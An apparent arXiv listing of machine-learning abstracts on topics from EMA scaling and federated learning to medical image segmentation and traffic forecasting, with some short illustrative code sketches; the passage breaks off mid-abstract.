    With the increased deployment of machine learning models in various real-world applications, researchers and practitioners alike have emphasized the need for explanations of model behaviour. To this end, two broad strategies have been outlined in prior literature to explain models. Post hoc explanation methods explain the behaviour of complex black-box models by highlighting features that are critical to model predictions; however, prior work has shown that these explanations may not be faithful, and even more concerning is our inability to verify them. Specifically, it is nontrivial to evaluate if a given attribution is correct with respect to the underlying model. Inherently interpretable models, on the other hand, circumvent these issues by explicitly encoding explanations into model architecture, meaning their explanations are naturally faithful and verifiable, but they often exhibit poor predictive performance due to their limited expressive power. In this work, we aim to bridge the gap between the aforementioned strategies by proposing Verifiability Tuning (VerT), a method that transforms black-box models into models that naturally yield faithful and verifiable feature attributions. We begin by introducing a formal theoretical framework to understand verifiability and show that attributions produced by standard models cannot be verified. We then leverage this framework to propose a method to build verifiable models and feature attributions out of fully trained black-box models. Finally, we perform extensive experiments on semi-synthetic and real-world datasets, and show that VerT produces models that (1) yield explanations that are correct and verifiable and (2) are faithful to the original black-box models they are meant to explain.
    How to Scale Your EMA. (arXiv:2307.13813v2 [stat.ML] UPDATED)
    Preserving training dynamics across batch sizes is an important tool for practical machine learning as it enables the trade-off between batch size and wall-clock time. This trade-off is typically enabled by a scaling rule, for example, in stochastic gradient descent, one should scale the learning rate linearly with the batch size. Another important tool for practical machine learning is the model Exponential Moving Average (EMA), which is a model copy that does not receive gradient information, but instead follows its target model with some momentum. This model EMA can improve the robustness and generalization properties of supervised learning, stabilize pseudo-labeling, and provide a learning signal for Self-Supervised Learning (SSL). Prior works have treated the model EMA separately from optimization, leading to different training dynamics across batch sizes and lower model performance. In this work, we provide a scaling rule for optimization in the presence of model EMAs and demonstrate its validity across a range of architectures, optimizers, and data modalities. We also show the rule's validity where the model EMA contributes to the optimization of the target model, enabling us to train EMA-based pseudo-labeling and SSL methods at small and large batch sizes. For SSL, we enable training of BYOL up to batch size 24,576 without sacrificing performance, optimally a 6$\times$ wall-clock time reduction.
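    The model EMA update and the scaling rule described above can be sketched in a few lines. Exponentiating the momentum by the batch-size scaling factor reflects the rule discussed in the abstract; the function and variable names, and the per-parameter list representation, are illustrative assumptions:

```python
def ema_update(ema_params, model_params, momentum):
    """EMA follows its target model without receiving gradients:
    ema <- momentum * ema + (1 - momentum) * model, per parameter."""
    return [momentum * e + (1.0 - momentum) * p
            for e, p in zip(ema_params, model_params)]

def scale_ema_momentum(momentum, kappa):
    """When the batch size is scaled by kappa, exponentiate the EMA momentum
    so the EMA's trajectory is preserved across batch sizes."""
    return momentum ** kappa

rho = 0.999
rho_scaled = scale_ema_momentum(rho, 8)  # e.g. 8x larger batches
```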
    Samplable Anonymous Aggregation for Private Federated Data Analysis. (arXiv:2307.15017v1 [cs.CR])
    We revisit the problem of designing scalable protocols for private statistics and private federated learning when each device holds its private data. Our first contribution is to propose a simple primitive that allows for efficient implementation of several commonly used algorithms, and allows for privacy accounting that is close to that in the central setting without requiring the strong trust assumptions it entails. Second, we propose a system architecture that implements this primitive and perform a security analysis of the proposed system.
    MCPA: Multi-scale Cross Perceptron Attention Network for 2D Medical Image Segmentation. (arXiv:2307.14588v1 [eess.IV])
    The UNet architecture, based on Convolutional Neural Networks (CNN), has demonstrated its remarkable performance in medical image analysis. However, it faces challenges in capturing long-range dependencies due to the limited receptive fields and inherent bias of convolutional operations. Recently, numerous transformer-based techniques have been incorporated into the UNet architecture to overcome this limitation by effectively capturing global feature correlations. However, the integration of the Transformer modules may result in the loss of local contextual information during the global feature fusion process. To overcome these challenges, we propose a 2D medical image segmentation model called Multi-scale Cross Perceptron Attention Network (MCPA). The MCPA consists of three main components: an encoder, a decoder, and a Cross Perceptron. The Cross Perceptron first captures the local correlations using multiple Multi-scale Cross Perceptron modules, facilitating the fusion of features across scales. The resulting multi-scale feature vectors are then spatially unfolded, concatenated, and fed through a Global Perceptron module to model global dependencies. Furthermore, we introduce a Progressive Dual-branch Structure to address the semantic segmentation of the image involving finer tissue structures. This structure gradually shifts the segmentation focus of MCPA network training from large-scale structural features to more sophisticated pixel-level features. We evaluate our proposed MCPA model on several publicly available medical image datasets from different tasks and devices, including the open large-scale dataset of CT (Synapse), MRI (ACDC), fundus camera (DRIVE, CHASE_DB1, HRF), and OCTA (ROSE). The experimental results show that our MCPA model achieves state-of-the-art performance. The code is available at https://github.com/simonustc/MCPA-for-2D-Medical-Image-Segmentation.
    Self-Contrastive Graph Diffusion Network. (arXiv:2307.14613v1 [cs.LG])
    Augmentation techniques and sampling strategies are crucial in contrastive learning, but in most existing works, augmentation techniques require careful design, and their sampling strategies can only capture a small amount of intrinsic supervision information. Additionally, the existing methods require complex designs to obtain two different representations of the data. To overcome these limitations, we propose a novel framework called the Self-Contrastive Graph Diffusion Network (SCGDN). Our framework consists of two main components: the Attentional Module (AttM) and the Diffusion Module (DiFM). AttM aggregates higher-order structure and feature information to get an excellent embedding, while DiFM balances the state of each node in the graph through Laplacian diffusion learning and allows the cooperative evolution of adjacency and feature information in the graph. Unlike existing methodologies, SCGDN is an augmentation-free approach that avoids "sampling bias" and semantic drift, without the need for pre-training. We conduct a high-quality sampling of samples based on structure and feature information. If two nodes are neighbors, they are considered positive samples of each other. If two disconnected nodes are also unrelated on the $k$NN graph, they are considered negative samples for each other. The contrastive objective makes full use of our proposed sampling strategies, and the redundancy reduction term minimizes redundant information in the embedding while retaining more discriminative information. In this framework, the graph self-contrastive learning paradigm proves to be a powerful tool. SCGDN effectively balances preserving high-order structure information with avoiding overfitting. The results show that SCGDN consistently outperforms both contrastive and classical methods.
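    The sampling strategy described above (neighbors as positives; pairs of nodes that are both disconnected and unrelated on the $k$NN graph as negatives) can be sketched directly. The adjacency-set representation and function names are illustrative assumptions, not the paper's implementation:

```python
def sample_pairs(adj, knn):
    """Return (positive, negative) node pairs.
    Positive: the two nodes are neighbors in the graph.
    Negative: the two nodes are disconnected AND unrelated on the kNN graph."""
    nodes = sorted(adj)
    pos, neg = [], []
    for i in nodes:
        for j in nodes:
            if j <= i:
                continue  # each unordered pair once
            if j in adj[i]:
                pos.append((i, j))
            elif j not in knn[i] and i not in knn[j]:
                neg.append((i, j))
    return pos, neg

# Toy graph: 0-1 connected, node 2 isolated and absent from both kNN sets.
adj = {0: {1}, 1: {0}, 2: set()}
knn = {0: {1}, 1: {0}, 2: set()}
print(sample_pairs(adj, knn))  # -> ([(0, 1)], [(0, 2), (1, 2)])
```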
    Function Value Learning: Adaptive Learning Rates Based on the Polyak Stepsize and Function Splitting in ERM. (arXiv:2307.14528v1 [cs.LG])
    Here we develop variants of SGD (stochastic gradient descent) with an adaptive step size that make use of the sampled loss values. In particular, we focus on solving a finite sum-of-terms problem, also known as empirical risk minimization. We first detail an idealized adaptive method called $\texttt{SPS}_+$ that makes use of the sampled loss values and assumes knowledge of the sampled loss at optimality. This $\texttt{SPS}_+$ is a minor modification of the SPS (Stochastic Polyak Stepsize) method, where the step size is enforced to be positive. We then show that $\texttt{SPS}_+$ achieves the best known rates of convergence for SGD in the non-smooth Lipschitz setting. We then move on to develop $\texttt{FUVAL}$, a variant of $\texttt{SPS}_+$ where the loss values at optimality are gradually learned, as opposed to being given. We give three viewpoints of $\texttt{FUVAL}$: as a projection-based method, as a variant of the prox-linear method, and as a particular online SGD method. We then present a convergence analysis of $\texttt{FUVAL}$ and experimental results. One shortcoming of our work is that the convergence analysis of $\texttt{FUVAL}$ shows no advantage over SGD. Another shortcoming is that currently only the full-batch version of $\texttt{FUVAL}$ shows a minor advantage over GD (Gradient Descent) in terms of sensitivity to the step size. The stochastic version shows no clear advantage over SGD. We conjecture that large mini-batches are required to make $\texttt{FUVAL}$ competitive. Currently the new $\texttt{FUVAL}$ method studied in this paper does not offer any clear theoretical or practical advantage. We have chosen to make this draft available online nonetheless because of some of the analysis techniques we use, such as the non-smooth analysis of $\texttt{SPS}_+$, and also to show an apparently interesting approach that currently does not work.
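    One plausible reading of the $\texttt{SPS}_+$ step, sketched under the standard Polyak-stepsize form with the numerator clipped at zero so the step size stays non-negative. The constant `c` and the small `eps` guard are illustrative assumptions, not the paper's exact parametrization:

```python
def sps_plus_step(f_val, f_star, grad, c=1.0, eps=1e-12):
    """SPS_+ stepsize sketch: gamma = max(f_i(x) - f_i*, 0) / (c * ||grad f_i(x)||^2),
    clipping the Polyak numerator at zero so the step is never negative."""
    grad_sq = sum(g * g for g in grad)
    return max(f_val - f_star, 0.0) / (c * grad_sq + eps)

def sgd_update(x, grad, gamma):
    """Plain SGD step with the given stepsize."""
    return [xi - gamma * gi for xi, gi in zip(x, grad)]

# One step on f_i(x) = 0.5 * x^2, where f_i* = 0 and grad f_i(x) = x:
x = [2.0]
gamma = sps_plus_step(f_val=2.0, f_star=0.0, grad=x)  # ~ 2 / 4 = 0.5
x = sgd_update(x, x, gamma)                           # ~ [1.0]
```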
    A LLM Assisted Exploitation of AI-Guardian. (arXiv:2307.15008v1 [cs.CR])
    Large language models (LLMs) are now highly capable at a diverse range of tasks. This paper studies whether or not GPT-4, one such LLM, is capable of assisting researchers in the field of adversarial machine learning. As a case study, we evaluate the robustness of AI-Guardian, a recent defense to adversarial examples published at IEEE S&P 2023, a top computer security conference. We completely break this defense: the proposed scheme does not increase robustness compared to an undefended baseline. We write none of the code to attack this model, and instead prompt GPT-4 to implement all attack algorithms following our instructions and guidance. This process was surprisingly effective and efficient, with the language model at times producing code from ambiguous instructions faster than the author of this paper could have done. We conclude by discussing (1) the warning signs present in the evaluation that suggested to us AI-Guardian would be broken, and (2) our experience with designing attacks and performing novel research using the most recent advances in language modeling.
    Bug Characterization in Machine Learning-based Systems. (arXiv:2307.14512v1 [cs.SE])
    The rapid growth of Machine Learning (ML) applications across domains, especially in safety-critical areas, increases the need for reliable ML components, i.e., software components operating based on ML. Understanding the characteristics of bugs and the maintenance challenges in ML-based systems can help developers of these systems identify where to focus maintenance and testing efforts, by giving insights into the most error-prone components, most common bugs, etc. In this paper, we investigate the characteristics of bugs in ML-based software systems and the difference between ML and non-ML bugs from the maintenance viewpoint. We extracted 447,948 GitHub repositories that used one of the three most popular ML frameworks, i.e., TensorFlow, Keras, and PyTorch. After multiple filtering steps, we selected the top 300 repositories with the highest number of closed issues. We manually investigated the extracted repositories to exclude non-ML-based systems. Our investigation involved a manual inspection of 386 sampled reported issues in the identified ML-based systems to indicate whether they affect ML components or not. Our analysis shows that nearly half of the real issues reported in ML-based systems are ML bugs, indicating that ML components are more error-prone than non-ML components. Next, we thoroughly examined 109 identified ML bugs to identify their root causes and symptoms, and to calculate their required fixing time. The results also revealed that ML bugs have significantly different characteristics compared to non-ML bugs in terms of the complexity of bug-fixing (number of commits, changed files, and changed lines of code). Based on our results, fixing ML bugs is more costly, and ML components are more error-prone, than their non-ML counterparts. Hence, paying significant attention to the reliability of ML components is crucial in ML-based systems.
    MVMR-FS : Non-parametric feature selection algorithm based on Maximum inter-class Variation and Minimum Redundancy. (arXiv:2307.14643v1 [cs.LG])
    How to accurately measure the relevance and redundancy of features is an age-old challenge in the field of feature selection. However, existing filter-based feature selection methods cannot directly measure redundancy for continuous data. In addition, most methods rely on manually specifying the number of features, which may introduce errors in the absence of expert knowledge. In this paper, we propose a non-parametric feature selection algorithm based on maximum inter-class variation and minimum redundancy, abbreviated as MVMR-FS. We first introduce supervised and unsupervised kernel density estimation on the features to capture their similarities and differences in inter-class and overall distributions. Subsequently, we present the criteria for maximum inter-class variation and minimum redundancy (MVMR), wherein the inter-class probability distributions are employed to reflect feature relevance and the distances between overall probability distributions are used to quantify redundancy. Finally, we employ an AGA to search for the feature subset that minimizes the MVMR. Compared with ten state-of-the-art methods, MVMR-FS achieves the highest average accuracy and improves the accuracy by 5% to 11%.
    Predictive Maintenance of Armoured Vehicles using Machine Learning Approaches. (arXiv:2307.14453v1 [cs.LG])
    Armoured vehicles are specialized and complex pieces of machinery designed to operate in high-stress environments, often in combat or tactical situations. This study proposes a predictive maintenance-based ensemble system that aids in predicting potential maintenance needs based on sensor data collected from these vehicles. The proposed model's architecture involves various models such as Light Gradient Boosting, Random Forest, Decision Tree, Extra Tree Classifier and Gradient Boosting to predict the maintenance requirements of the vehicles accurately. In addition, K-fold cross validation, along with TOPSIS analysis, is employed to evaluate the proposed ensemble model's stability. The results indicate that the proposed system achieves an accuracy of 98.93%, precision of 99.80% and recall of 99.03%. The algorithm can effectively predict maintenance needs, thereby reducing vehicle downtime and improving operational efficiency. Through comparisons between various algorithms and the suggested ensemble, this study highlights the potential of machine learning-based predictive maintenance solutions.
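    The hard-voting ensemble at the core of such a system can be sketched in pure Python. The toy labels and per-model predictions below are illustrative, not the study's base learners or data:

```python
from collections import Counter

def majority_vote(predictions_per_model):
    """Hard-voting ensemble: each base model votes a label per sample;
    the most common vote wins for each sample."""
    n_samples = len(predictions_per_model[0])
    combined = []
    for i in range(n_samples):
        votes = [preds[i] for preds in predictions_per_model]
        combined.append(Counter(votes).most_common(1)[0][0])
    return combined

# Three toy "models" disagreeing on the middle sample:
preds = [
    ["ok", "fail", "ok"],
    ["ok", "ok",   "ok"],
    ["ok", "fail", "fail"],
]
print(majority_vote(preds))  # -> ['ok', 'fail', 'ok']
```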
    Open Problems in Computer Vision for Wilderness SAR and The Search for Patricia Wu-Murad. (arXiv:2307.14527v1 [cs.CV])
    This paper details the challenges in applying two computer vision systems, an EfficientDET supervised learning model and the unsupervised RX spectral classifier, to 98.9 GB of drone imagery from the Wu-Murad wilderness search and rescue (WSAR) effort in Japan and identifies 3 directions for future research. There have been at least 19 proposed approaches and 3 datasets aimed at locating missing persons in drone imagery, but only 3 approaches (2 unsupervised and 1 of unknown structure) are referenced in the literature as having been used in an actual WSAR operation. Of these proposed approaches, the EfficientDET architecture and the unsupervised spectral RX classifier were selected as the most appropriate for this setting. The EfficientDET model was applied to the HERIDAL dataset and, despite achieving performance that is statistically equivalent to the state-of-the-art, the model fails to translate to the real world in terms of false positives (e.g., identifying tree limbs and rocks as people) and false negatives (e.g., failing to identify members of the search team). The poor results in practice for algorithms that showed good results on datasets suggest 3 areas of future research: more realistic datasets for wilderness SAR, computer vision models that are capable of seamlessly handling the variety of imagery that can be collected during actual WSAR operations, and better alignment on performance measures.
    Counterfactual Explanations for Graph Classification Through the Lenses of Density. (arXiv:2307.14849v1 [cs.LG])
    Counterfactual examples have emerged as an effective approach to produce simple and understandable post-hoc explanations. In the context of graph classification, previous work has focused on generating counterfactual explanations by manipulating the most elementary units of a graph, i.e., removing an existing edge, or adding a non-existing one. In this paper, we claim that such language of explanation might be too fine-grained, and turn our attention to some of the main characterizing features of real-world complex networks, such as the tendency to close triangles, the existence of recurring motifs, and the organization into dense modules. We thus define a general density-based counterfactual search framework to generate instance-level counterfactual explanations for graph classifiers, which can be instantiated with different notions of dense substructures. In particular, we show two specific instantiations of this general framework: a method that searches for counterfactual graphs by opening or closing triangles, and a method driven by maximal cliques. We also discuss how the general method can be instantiated to exploit any other notion of dense substructures, including, for instance, a given taxonomy of nodes. We evaluate the effectiveness of our approaches in 7 brain network datasets and compare the counterfactual statements generated according to several widely-used metrics. Results confirm that adopting a semantic-relevant unit of change like density is essential to define versatile and interpretable counterfactual explanation methods.
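    A minimal sketch of the triangle-based instantiation: enumerate open triangles (two edges present, the third missing), each of which is a candidate "close the triangle" edit for a density-based counterfactual search. The adjacency-set representation and enumeration order are illustrative assumptions:

```python
def closeable_triangles(adj):
    """List open triangles (i, j, k): edges i-j and j-k exist but i-k is missing.
    Closing any of them is a candidate density-increasing counterfactual edit."""
    open_tris = []
    for j, nbrs in adj.items():
        nbrs = sorted(nbrs)
        for a in range(len(nbrs)):
            for b in range(a + 1, len(nbrs)):
                i, k = nbrs[a], nbrs[b]
                if k not in adj[i]:
                    open_tris.append((i, j, k))
    return open_tris

# Path graph 0-1-2: the single open triangle closes by adding edge (0, 2).
adj = {0: {1}, 1: {0, 2}, 2: {1}}
print(closeable_triangles(adj))  # -> [(0, 1, 2)]
```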
    Linear Convergence of Black-Box Variational Inference: Should We Stick the Landing?. (arXiv:2307.14642v1 [stat.ML])
    We prove that black-box variational inference (BBVI) with control variates, particularly the sticking-the-landing (STL) estimator, converges at a geometric (traditionally called "linear") rate under perfect variational family specification. In particular, we prove a quadratic bound on the gradient variance of the STL estimator, one which encompasses misspecified variational families. Combined with previous works on the quadratic variance condition, this directly implies convergence of BBVI with the use of projected stochastic gradient descent. We also improve existing analysis on the regular closed-form entropy gradient estimators, which enables comparison against the STL estimator and provides explicit non-asymptotic complexity guarantees for both.
    2D-Shapley: A Framework for Fragmented Data Valuation. (arXiv:2306.10473v2 [cs.LG] UPDATED)
    Data valuation -- quantifying the contribution of individual data sources to certain predictive behaviors of a model -- is of great importance to enhancing the transparency of machine learning and designing incentive systems for data sharing. Existing work has focused on evaluating data sources with the shared feature or sample space. How to valuate fragmented data sources of which each only contains partial features and samples remains an open question. We start by presenting a method to calculate the counterfactual of removing a fragment from the aggregated data matrix. Based on the counterfactual calculation, we further propose 2D-Shapley, a theoretical framework for fragmented data valuation that uniquely satisfies some appealing axioms in the fragmented data context. 2D-Shapley empowers a range of new use cases, such as selecting useful data fragments, providing interpretation for sample-wise data values, and fine-grained data issue diagnosis.
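    The fragment-removal operation underlying the counterfactual calculation can be sketched as below. The paper's actual counterfactual is computed on the aggregated data matrix and is more involved; this only illustrates the block indexing, with hypothetical names:

```python
def remove_fragment(matrix, rows, cols):
    """Counterfactual data matrix with one fragment removed: drop the block
    of samples (rows) and features (cols) contributed by that fragment."""
    return [[v for j, v in enumerate(row) if j not in cols]
            for i, row in enumerate(matrix) if i not in rows]

# Toy aggregated matrix: 3 samples x 3 features.
M = [[1, 2, 3],
     [4, 5, 6],
     [7, 8, 9]]
print(remove_fragment(M, rows={0}, cols={2}))  # -> [[4, 5], [7, 8]]
```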
    How Good is Google Bard's Visual Understanding? An Empirical Study on Open Challenges. (arXiv:2307.15016v1 [cs.CV])
    Google's Bard has emerged as a formidable competitor to OpenAI's ChatGPT in the field of conversational AI. Notably, Bard has recently been updated to handle visual inputs alongside text prompts during conversations. Given Bard's impressive track record in handling textual inputs, we explore its capabilities in understanding and interpreting visual data (images) conditioned by text questions. This exploration holds the potential to unveil new insights and challenges for Bard and other forthcoming multi-modal Generative models, especially in addressing complex computer vision problems that demand accurate visual and language understanding. Specifically, in this study, we focus on 15 diverse task scenarios encompassing regular, camouflaged, medical, under-water and remote sensing data to comprehensively evaluate Bard's performance. Our primary finding indicates that Bard still struggles in these vision scenarios, highlighting the significant gap in vision-based understanding that needs to be bridged in future developments. We expect that this empirical study will prove valuable in advancing future models, leading to enhanced capabilities in comprehending and interpreting fine-grained visual data. Our project is released on https://github.com/htqin/GoogleBard-VisUnderstand
    A Strategic Framework for Optimal Decisions in Football 1-vs-1 Shot-Taking Situations: An Integrated Approach of Machine Learning, Theory-Based Modeling, and Game Theory. (arXiv:2307.14732v1 [cs.LG])
    Complex interactions between two opposing agents frequently occur in machine learning, game theory, and other application domains. Quantitatively analyzing the strategies involved can provide an objective basis for decision-making. One such critical scenario is shot-taking in football, where decisions, such as whether the attacker should shoot or pass the ball and whether the defender should attempt to block the shot, play a crucial role in the outcome of the game. However, there are currently no effective data-driven and/or theory-based approaches to analyzing such situations. To address this issue, we propose a novel framework to analyze such scenarios based on game theory, where we estimate the expected payoff with machine learning (ML) models, and additional features for the ML models are extracted with a theory-based shot block model. Conventionally, successes or failures (1 or 0) are used as payoffs, whereas a successful shot (goal) is extremely rare in football. Therefore, we propose the Expected Probability of Shot On Target (xSOT) metric to evaluate players' actions even if the shot results in no goal; this allows for effective differentiation and comparison between different shots and even enables counterfactual shot situation analysis. In our experiments, we have validated the framework by comparing it with baseline and ablated models. Furthermore, we have observed a high correlation between xSOT and existing metrics. This alignment of information suggests that xSOT provides valuable insights. Lastly, as an illustration, we studied optimal strategies in the World Cup 2022 and analyzed a shot situation in EURO 2020.
    Generative convective parametrization of dry atmospheric boundary layer. (arXiv:2307.14857v1 [physics.flu-dyn])
    Turbulence parametrizations will remain a necessary building block in kilometer-scale Earth system models. In convective boundary layers, where the mean vertical gradients of conserved properties such as potential temperature and moisture are approximately zero, the standard ansatz which relates turbulent fluxes to mean vertical gradients via an eddy diffusivity has to be extended by mass flux parametrizations for the typically asymmetric up- and downdrafts in the atmospheric boundary layer. In this work, we present a parametrization for a dry convective boundary layer based on a generative adversarial network. The model incorporates the physics of self-similar layer growth following from the classical mixed layer theory by Deardorff. This enhances the training data base of the generative machine learning algorithm and thus significantly improves the predicted statistics of the synthetically generated turbulence fields at different heights inside the boundary layer. The algorithm training is based on fully three-dimensional direct numerical simulation data. Unlike stochastic parametrizations, our model is able to predict the highly non-Gaussian transient statistics of buoyancy fluctuations, vertical velocity, and buoyancy flux at different heights, thus also capturing the fastest thermals penetrating into the stabilized top region. The results of our generative algorithm agree with standard two-equation or multi-plume stochastic mass-flux schemes. The present parametrization additionally provides the granule-type horizontal organization of the turbulent convection, which cannot be obtained with any of the other model closures. Our work paves the way to efficient data-driven convective parametrizations in other natural flows, such as moist convection, upper ocean mixing, or convection in stellar interiors.
    Thinker: Learning to Plan and Act. (arXiv:2307.14993v1 [cs.AI])
    We propose the Thinker algorithm, a novel approach that enables reinforcement learning agents to autonomously interact with and utilize a learned world model. The Thinker algorithm wraps the environment with a world model and introduces new actions designed for interacting with the world model. These model-interaction actions enable agents to perform planning by proposing alternative plans to the world model before selecting a final action to execute in the environment. This approach eliminates the need for hand-crafted planning algorithms by enabling the agent to learn how to plan autonomously and allows for easy interpretation of the agent's plan with visualization. We demonstrate the algorithm's effectiveness through experimental results in the game of Sokoban and the Atari 2600 benchmark, where the Thinker algorithm achieves state-of-the-art performance and competitive results, respectively. Visualizations of agents trained with the Thinker algorithm demonstrate that they have learned to plan effectively with the world model to select better actions. The algorithm's generality opens a new research direction on how a world model can be used in reinforcement learning and how planning can be seamlessly integrated into an agent's decision-making process.
    BubbleML: A Multi-Physics Dataset and Benchmarks for Machine Learning. (arXiv:2307.14623v1 [cs.LG])
    In the field of phase change phenomena, the lack of accessible and diverse datasets suitable for machine learning (ML) training poses a significant challenge. Existing experimental datasets are often restricted, with limited availability and sparse ground truth data, impeding our understanding of this complex multi-physics phenomena. To bridge this gap, we present the BubbleML Dataset(https://github.com/HPCForge/BubbleML) which leverages physics-driven simulations to provide accurate ground truth information for various boiling scenarios, encompassing nucleate pool boiling, flow boiling, and sub-cooled boiling. This extensive dataset covers a wide range of parameters, including varying gravity conditions, flow rates, sub-cooling levels, and wall superheat, comprising 51 simulations. BubbleML is validated against experimental observations and trends, establishing it as an invaluable resource for ML research. Furthermore, we showcase its potential to facilitate exploration of diverse downstream tasks by introducing two benchmarks: (a) optical flow analysis to capture bubble dynamics, and (b) operator networks for learning temperature dynamics. The BubbleML dataset and its benchmarks serve as a catalyst for advancements in ML-driven research on multi-physics phase change phenomena, enabling the development and comparison of state-of-the-art techniques and models.
    Benchmarking Performance of Deep Learning Model for Material Segmentation on Two HPC Systems. (arXiv:2307.14921v1 [cs.PF])
Performance benchmarking of HPC systems is an ongoing effort that seeks to provide information that will allow for increased performance and improve the job schedulers that manage these systems. We develop a benchmarking tool that utilizes machine learning models and gathers performance data on GPU-accelerated nodes while they perform material segmentation analysis. The benchmark uses an ML model that has been converted from Caffe to PyTorch using the MMdnn toolkit and the MINC-2500 dataset. Performance data is gathered on two ERDC DSRC systems, Onyx and Vulcanite. The data reveals that while Vulcanite achieves faster model times in a large number of benchmarks, it is also more subject to environmental factors that can slow its performance below Onyx's. In contrast, the model times from Onyx are consistent across benchmarks.
    Graph-based Polyphonic Multitrack Music Generation. (arXiv:2307.14928v1 [cs.SD])
    Graphs can be leveraged to model polyphonic multitrack symbolic music, where notes, chords and entire sections may be linked at different levels of the musical hierarchy by tonal and rhythmic relationships. Nonetheless, there is a lack of works that consider graph representations in the context of deep learning systems for music generation. This paper bridges this gap by introducing a novel graph representation for music and a deep Variational Autoencoder that generates the structure and the content of musical graphs separately, one after the other, with a hierarchical architecture that matches the structural priors of music. By separating the structure and content of musical graphs, it is possible to condition generation by specifying which instruments are played at certain times. This opens the door to a new form of human-computer interaction in the context of music co-creation. After training the model on existing MIDI datasets, the experiments show that the model is able to generate appealing short and long musical sequences and to realistically interpolate between them, producing music that is tonally and rhythmically consistent. Finally, the visualization of the embeddings shows that the model is able to organize its latent space in accordance with known musical concepts.
    Federated Model Aggregation via Self-Supervised Priors for Highly Imbalanced Medical Image Classification. (arXiv:2307.14959v1 [cs.CV])
In the medical field, federated learning commonly deals with highly imbalanced datasets, including skin lesions and gastrointestinal images. Existing federated methods under highly imbalanced datasets primarily focus on optimizing a global model without incorporating the intra-class variations that can arise in medical imaging due to different populations, findings, and scanners. In this paper, we study the inter-client intra-class variations with publicly available self-supervised auxiliary networks. Specifically, we find that employing a shared auxiliary pre-trained model, like MoCo-V2, locally on every client yields consistent divergence measurements. Based on these findings, we derive a dynamic balanced model aggregation via self-supervised priors (Fed-MAS) to guide the global model optimization. Fed-MAS can be utilized with different local learning methods for effective model aggregation toward a highly robust and unbiased global model. Our code is available at \url{https://github.com/xmed-lab/Fed-MAS}.
    Training Quantum Boltzmann Machines with Coresets. (arXiv:2307.14459v1 [quant-ph])
Recent work has proposed and explored using coreset techniques for quantum algorithms that operate on classical data sets, to accelerate the applicability of these algorithms on near-term quantum devices. We apply these ideas to Quantum Boltzmann Machines (QBMs), where gradient-based steps that require Gibbs state sampling are the main computational bottleneck during training. By using a coreset in place of the full data set, we aim to minimize the number of steps needed and accelerate the overall training time. In a regime where computational time on quantum computers is a precious resource, we propose that this might lead to substantial practical savings. We evaluate this approach on 6x6 binary images from an augmented bars-and-stripes data set using a QBM with 36 visible units and 8 hidden units. Using an Inception-score-inspired metric, we compare QBM training times with and without coresets.
    Machine Learning based Parameter Sensitivity of Regional Climate Models -- A Case Study of the WRF Model for Heat Extremes over Southeast Australia. (arXiv:2307.14654v1 [physics.ao-ph])
Heatwaves and bushfires cause substantial impacts on society and ecosystems across the globe. Accurate information on heat extremes is needed to support the development of actionable mitigation and adaptation strategies. Regional climate models are commonly used to better understand the dynamics of these events. These models have very large input parameter sets, and the parameters within the physics schemes substantially influence the model's performance. However, parameter sensitivity analysis (SA) of regional models for heat extremes is largely unexplored. Here, we focus on the southeast Australian region, one of the global hotspots of heat extremes, where the Weather Research and Forecasting (WRF) model is the widely used regional model for simulating extreme weather events. Hence, in this study, we focus on the sensitivity of surface meteorological variables such as temperature, relative humidity, and wind speed to WRF model parameters during two extreme heat events over southeast Australia. Due to the presence of multiple parameters and their complex relationships with output variables, a machine learning (ML) surrogate-based global sensitivity analysis method is adopted. The ML surrogate-based Sobol SA is used to identify the sensitivity of 24 adjustable parameters in seven different physics schemes of the WRF model. Results show that, out of these 24, only three parameters, namely the scattering tuning parameter, the multiplier of saturated soil water content, and the profile shape exponent in the momentum diffusivity coefficient, are important for the considered meteorological variables. These SA results are consistent across the two extreme heat events. Further, we investigated the physical significance of the sensitive parameters. This study's results will help in further optimising WRF parameters to improve model simulation.
    Prediction of wind turbines power with physics-informed neural networks and evidential uncertainty quantification. (arXiv:2307.14675v1 [cs.LG])
The ever-growing use of wind energy makes it necessary to optimize turbine operations through pitch angle controllers and to maintain turbines with early fault detection. It is crucial to have accurate and robust models imitating the behavior of wind turbines, especially to predict the generated power as a function of the wind speed. Existing empirical and physics-based models have limitations in capturing the complex relations between the input variables and the power, aggravated by wind variability. Data-driven methods offer new opportunities to enhance wind turbine modeling from large datasets by improving accuracy and efficiency. In this study, we used physics-informed neural networks to reproduce historical data from 4 turbines in a wind farm, while imposing certain physical constraints on the model. The developed models for regression of the power, torque, and power coefficient as output variables showed great accuracy for both real data and the physical equations governing the system. Lastly, introducing an efficient evidential layer provided uncertainty estimates of the predictions, which proved consistent with the absolute error and made it possible to define a confidence interval on the power curve.
    Robust Assignment of Labels for Active Learning with Sparse and Noisy Annotations. (arXiv:2307.14380v1 [cs.LG])
Supervised classification algorithms are used to solve a growing number of real-life problems around the globe. Their performance is strictly connected with the quality of labels used in training. Unfortunately, acquiring good-quality annotations for many tasks is infeasible or too expensive to be done in practice. To tackle this challenge, active learning algorithms are commonly employed to select only the most relevant data for labeling. However, this is possible only when the quality and quantity of labels acquired from experts are sufficient. Unfortunately, in many applications a trade-off is necessary between annotating individual samples by multiple annotators to increase label quality and annotating new samples to increase the total number of labeled instances. In this paper, we address the issue of faulty data annotations in the context of active learning. In particular, we propose two novel annotation unification algorithms that utilize unlabeled parts of the sample space. The proposed methods require little to no intersection between samples annotated by different experts. Our experiments on four public datasets demonstrate the robustness and superiority of the proposed methods in both the estimation of annotator reliability and the assignment of actual labels, compared against state-of-the-art algorithms and simple majority voting.
    HUTFormer: Hierarchical U-Net Transformer for Long-Term Traffic Forecasting. (arXiv:2307.14596v1 [cs.LG])
    Traffic forecasting, which aims to predict traffic conditions based on historical observations, has been an enduring research topic and is widely recognized as an essential component of intelligent transportation. Recent proposals on Spatial-Temporal Graph Neural Networks (STGNNs) have made significant progress by combining sequential models with graph convolution networks. However, due to high complexity issues, STGNNs only focus on short-term traffic forecasting, e.g., 1-hour forecasting, while ignoring more practical long-term forecasting. In this paper, we make the first attempt to explore long-term traffic forecasting, e.g., 1-day forecasting. To this end, we first reveal its unique challenges in exploiting multi-scale representations. Then, we propose a novel Hierarchical U-net TransFormer (HUTFormer) to address the issues of long-term traffic forecasting. HUTFormer consists of a hierarchical encoder and decoder to jointly generate and utilize multi-scale representations of traffic data. Specifically, for the encoder, we propose window self-attention and segment merging to extract multi-scale representations from long-term traffic data. For the decoder, we design a cross-scale attention mechanism to effectively incorporate multi-scale representations. In addition, HUTFormer employs an efficient input embedding strategy to address the complexity issues. Extensive experiments on four traffic datasets show that the proposed HUTFormer significantly outperforms state-of-the-art traffic forecasting and long time series 